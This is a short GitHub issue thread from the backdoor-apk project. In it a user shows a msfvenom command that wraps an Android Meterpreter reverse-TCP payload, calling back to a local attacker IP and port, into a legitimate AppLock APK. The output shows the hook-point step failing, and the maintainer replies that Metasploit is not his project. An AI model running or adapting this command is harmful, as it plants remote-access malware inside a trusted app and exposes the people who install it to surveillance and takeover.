### ISSUE TITLE
unable to find hookpoint of applock.apk

### ISSUE THREAD

**Issue by shreyasbadachi** [dana-at-cp/backdoor-apk#142]
root@Hacker:~/Desktop# msfvenom -x applock-2-6-7.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.25 LPORT=4444 -o applockloded.apk
Using APK template: applock-2-6-7.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: Unable to find hook point in /tmp/d20180630-3922-qw5crn/original/smali*/com/domobile/applock/AppLockApplication.smali
,,,,,,,,,,,,,

PLEASE SOLVE MY PROBLEM

**Comment by dana-at-cp** [comment]
@shreyasbadachi Haha! I originally didn't notice that you submitted an issue for msfvenom. I don't support the Metasploit project directly. Try the rapid7/Metasploit github repos.
